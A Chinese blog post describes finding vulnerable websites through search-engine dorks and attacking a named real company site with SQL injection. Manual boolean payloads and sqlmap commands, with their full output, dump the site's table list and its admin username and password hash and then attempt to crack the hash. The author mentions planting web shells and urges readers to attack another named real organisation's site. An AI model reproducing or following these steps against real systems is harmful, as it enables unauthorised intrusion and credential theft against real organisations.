SQL注入之实践--初试小刀

最新推荐文章于 2023-09-29 12:54:20 发布
最新推荐文章于 2023-09-29 12:54:20 发布
阅读量1.4w 收藏 8
点赞数 2
分类专栏: 科研项目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiangliuzheng/article/details/51878398
版权
1、sql注入的原理
sql注入是针对web客户端在提交数据时未对用户数据进行过滤,导致用户的特殊字符在数据库里被执行而导致的高危漏洞,恶意的可以删除整个数据库,提权到服务器挂马等。
一般acess数据库没有过滤的话直接暴库,但是不能提权哦,比较喜欢的还是mysql、sqlserver,可以提权,进行挂马等操作。之前在google上搜了一大堆具有sql injured的网站,今天就找一两个细致的演练一番。
2、sql注入google搜索
google搜索能帮我们找到我们想要的输入参数的网站,其基本语法很多,就举一个简单的例子:inrul:?id= ,可以看到搜索的结果;其实个人觉得百度上现在也能搜索,而且大部分都是中文比较好看点。
找到一个网站,试了下第一个就可以:http://www.inbond-cn.com/showproducts.asp?id=91
3、sql注入之测试
http://www.inbond-cn.com/showproducts.asp?id=91 and 1=1 页面显示如初
http://www.inbond-cn.com/showproducts.asp?id=91 and 1=2 页面显示东西少了,其实就是没有到数据库里面读出数据,因为and 1=2错误。
http://www.inbond-cn.com/showproducts.asp?id=91 and exists(select * from product) 页面显示正常,因为页面是product页面,所以猜测数据库里有product
到这一步基本上可以确定这个网站有注入漏洞了。

4、sqlmap跑起来
(1)启动sqlmap 不多说了,之前讲过。先看下什么数据库,运行命令:sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --dbs

c:\Python27\sqlmap>sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.6.66#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:17:19

[10:17:19] [INFO] resuming back-end DBMS 'microsoft access'
[10:17:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=91 AND 9285=9285
---
[10:17:20] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:17:20] [WARNING] on Microsoft Access it is not possible to enumerate databases (use only '--tables')
[10:17:20] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com'
结果显示是Access数据库,哎,不能提权。
(2)Access直接暴库赛
c:\Python27\sqlmap>sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --tables
         _
 ___ ___| |_____ ___ ___  {1.0.6.66#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:19:32

[10:19:32] [INFO] resuming back-end DBMS 'microsoft access'
[10:19:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=91 AND 9285=9285
---
[10:19:33] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:19:33] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[10:19:33] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[10:19:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:19:33] [INFO] retrieved:
[10:19:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:19:34] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[10:19:34] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[8 tables]
+----------+
| admin    |
| download |
| feedback |
| market   |
| news     |
| product  |
| province |
| vote     |
+----------+

[10:19:34] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com'
看到没直接爆出这几张表,我们就看看admin表里的数据吧,猜到后台的话,还可以登录到后台进行网站挂马。
(3)暴出你的用户密码来
这个时间比较长,尼玛,公司里的绩效又是我最少,干活我最多,坑爹,老子早晚走人。

c:\Python27\sqlmap>sqlmap.py -u http://www.inbond-cn.com/showproducts.asp?id=91 --dump -T admin
         _
 ___ ___| |_____ ___ ___  {1.0.6.66#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:04:15

[11:04:15] [INFO] resuming back-end DBMS 'microsoft access'
[11:04:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=91 AND 9285=9285
---
[11:04:16] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[11:04:16] [ERROR] cannot retrieve column names, back-end DBMS is Microsoft Access
[11:04:16] [INFO] fetching entries for table 'admin' in database 'Microsoft_Access_masterdb'
[11:04:16] [INFO] fetching number of entries for table 'admin' in database 'Microsoft_Access_masterdb'
[11:04:16] [INFO] resumed: 1
[11:04:16] [INFO] fetching number of distinct values for column 'id'
[11:04:16] [INFO] resumed: 1
[11:04:16] [INFO] using column 'id' as a pivot for retrieving row data
[11:04:16] [INFO] resumed: 3
[11:04:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:04:16] [INFO] retrieved:
[11:04:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[11:04:19] [INFO] retrieved:
[11:04:22] [INFO] resumed: 0
[11:04:22] [INFO] resumed: _\xb7V\xfdKLOTZ
[11:04:22] [INFO] resuming partial value: 2cf8a3beab0297a4
[11:04:22] [INFO] retrieved:
[11:04:26] [INFO] retrieved: admin
[11:04:54] [INFO] retrieved:
[11:05:02] [INFO] analyzing table dump for possible password hashes
[11:05:02] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[11:07:56] [INFO] writing hashes to a temporary file 'c:\users\jlz\appdata\local\temp\sqlmaph_bimp13180\sqlmaphashes-vpiazb.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[11:07:58] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Python27\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[11:08:00] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[11:08:07] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[11:08:07] [INFO] starting 4 processes
[11:08:44] [INFO] using suffix '1'
[11:09:18] [INFO] using suffix '123'
[11:09:58] [INFO] using suffix '2'
[11:10:30] [INFO] using suffix '12'
[11:11:02] [INFO] using suffix '3'
[11:11:31] [INFO] using suffix '13'
[11:12:04] [INFO] using suffix '7'
[11:12:37] [INFO] using suffix '11'
[11:13:08] [INFO] using suffix '5'
[11:13:40] [INFO] using suffix '22'
[11:14:15] [INFO] using suffix '23'
[11:14:48] [INFO] using suffix '01'
[11:15:20] [INFO] using suffix '4'
[11:15:55] [INFO] using suffix '07'
[11:16:31] [INFO] using suffix '21'
[11:17:06] [INFO] using suffix '14'
[11:17:39] [INFO] using suffix '10'
[11:18:10] [INFO] using suffix '06'
[11:18:42] [INFO] using suffix '08'
[11:19:12] [INFO] using suffix '8'
[11:19:43] [INFO] using suffix '15'
[11:20:16] [INFO] using suffix '69'
[11:20:46] [INFO] using suffix '16'
[11:21:22] [INFO] using suffix '6'
[11:21:55] [INFO] using suffix '18'
[11:22:32] [INFO] using suffix '!'
[11:23:03] [INFO] using suffix '.'
[11:23:34] [INFO] using suffix '*'
[11:24:04] [INFO] using suffix '!!'
[11:24:34] [INFO] using suffix '?'
[11:25:03] [INFO] using suffix ';'
[11:25:32] [INFO] using suffix '..'
[11:26:04] [INFO] using suffix '!!!'
[11:26:36] [INFO] using suffix ', '
[11:27:08] [INFO] using suffix '@'
[11:27:36] [WARNING] no clear password(s) found
[11:27:36] [INFO] postprocessing table dump
Database: Microsoft_Access_masterdb
Table: admin
[1 entry]
+----+------------+---------+-----------------+-------+---------+----------+------------------+
| id | product_id | unit    | title           | price | key     | username | password         |
+----+------------+---------+-----------------+-------+---------+----------+------------------+
| 3  | NULL       | <blank> | _\xb7V\xfdKLOTZ | 0     | <blank> | admin    | 2cf8a3beab0297a4 |
+----+------------+---------+-----------------+-------+---------+----------+------------------+

[11:27:36] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com\dump\Microsoft_Access_masterdb\admin.csv'
[11:27:36] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.inbond-cn.com'
好了就到这里了,心情不太好 后台用户名密码已经出来了,后台我没猜到,有一个中国城市规划院深圳分院的门户网站,也是一样的道理,acess数据库而且网站后台也可以猜到,大家可以试一试


天空里的飞鸟
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 7767
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
SQL注入-防范-ppt.pptx
10-27
SQL相关资料
SQL注入-概述-ppt.pptx
10-27
SQL相关资料
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
牛掰!从sql注入到连接3389只需这几步
Appleteachers的博客
05-21 2044
REST 是一种现代架构风格,它定义了一种设计 Web 服务的新方法。和之前的 HTTP 以及 SOA 不同,它不是一个协议(即:一套严格的规则),而是一些关于 Web 服务应该如何相互通信的一些建议和最佳实践。按照 REST 最佳实践开发的服务被称为 “RESTful Web 服务”。 安全性是 RESTful 服务的基石。启用它的方法之一是尽可能内置用户身份验证和授权机制。 在 RESTful 服务中实现用户身份验证和授权的方法有很多。我们今天要讲的主要方法(或标准)有: Basic 认证 OAuth
BUUCTF web之随便注
yy
11-21 2115
启动靶场访问如下,输入1',报错,可知是字符型注入,变量由单引号包裹输入1' and 1=1 --+,显示正常先直接用sqlmap注入一下,显示存在注入,但是始终注入不出来数据库,“[ERROR] unable to retrieve the number of databases”,猜想应该是存在字符过滤因为现在还不知道是什么原因导致的sqlmap注入不出来,所以先尝试手注。输入框中输入1和2显示的结果不同,像这种直接回显输入的最先尝试联合注入。
sql漏洞注入(初级)
qq_35489632的博客
05-27 294
sql漏洞注入(初级) 文章目录sql漏洞注入(初级)在浏览器上查看相关参数获取数据库GET注入获取数据库信息查询数据库用户信息爆破字段 在浏览器上查看相关参数 1.cookie 2.提交的url [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X0NYGTMq-1590577879460)(./1590573311450.png)] 获取数据库 \\只截取关键部分 root@anes:~# sqlmap -u "http://192.168.42.128/dvwa/vu
sqlmap 学习及漏洞注入
m0_55754984的博客
08-13 1125
sqlmap简介 SQLMap是一个开放源码的测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终测试人员提供很多猥琐的功能,可以访问底层的文件系统,可以通过带外连接执行操作系统上的命令。 Sqlmap功能 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。sqlmap的功能强大到让你惊叹,常规注入工具不能绕过的话,终极使用sqlmap会有意想不到的效果。 1、判断可注入的参数 2、判断可以用那..
记录一次SQL注入src挖掘过程
最新发布
m0_62584974的博客
09-29 540
记录挖洞小白的一次SQL注入挖洞经历
sqlmap代码
qq_46648283的博客
05-20 5731
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
Sqlmap2021 -- Referer注入
weixin_41489908的博客
07-07 1843
一直向前走,天总会亮的。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包,将封包内容保存到referer.txt POST /sqli/Less-19/ HTTP/1.1 Host: 192.168.139.129 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.139.129 Content-Type: a..
04_SQL注入_其他数据库&工具的入门
qq_42171569的博客
05-01 2112
04_SQL注入_其他数据库&工具的入门 1. sqlmap 入门 前几篇博文主要是以手工方式进行注入,本篇博文简要介绍注入工具的使用。需要注意,工具的使用只是一定程度上提供了便利,并不能完全取代工具,实战中很少存在全自动操作,配合工具半自动操作,或是根据业务自主编写脚本才是可取之法,对于渗透工具的使用和手工操作无非是用筷子吃饭和用叉子吃饭的区别。 在使用工具时,也存在一定的限制。信息行业日新月异,工具开发者也不能做到面面俱到,以sqlmap为例,其目前支持的数据库有 MySql、Oracle、Ac
Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1685
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
SQLmap实战记录
积木网络
08-22 1万+
【-u/--url="url"】 #后面接目标网址,表示测试的目标地址。 【-v/--level=number】 #number=[0-5],表示测试结果的详细程度。数值越大,内容越详细。 sqlmap.py -u “url” -v 0-5 或 sqlmap.py --url="url" --level=0-5 通过以上参数,会得到: 1、目标的操作系统信息 2、数据库的类
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)
mooyuan的博客
11-26 2416
iwebsec靶场的SQL注入漏洞的第03关bool注入漏洞渗透,通过源码再来分析下布尔型SQL注入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字型(2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的布尔型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
sqlmap用法
热门推荐
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
sql注入,sqli-lab
07-28
SQL注入是一种常见的网络安全漏洞,攻击者可以通过构造恶意的SQL查询语句来绕过应用程序的身份验证和授权机制,从而获取未经授权的访问权限或者执行非法操作。Sqli-lab是一个用于学习和实践SQL注入的实验环境。 在Sqli-lab中,你可以使用各种技术和工具来进行SQL注入攻击,并学习如何修复和防止这类漏洞。这个实验环境提供了一系列具有不同难度级别的注入场景,你可以尝试不同的注入技巧和方法。 重要的是,在真实环境中,开发人员应该采取一些安全措施来防止SQL注入攻击,例如使用参数化查询或者ORM框架,对用户输入进行严格的验证和过滤,限制数据库账号的权限等等。 如果你想深入学习SQL注入和防御方法,可以尝试在合法授权的环境下使用Sqli-lab进行实践。但请注意,在真实环境中进行SQL注入攻击是违法行为,严禁未经授权的测试和攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值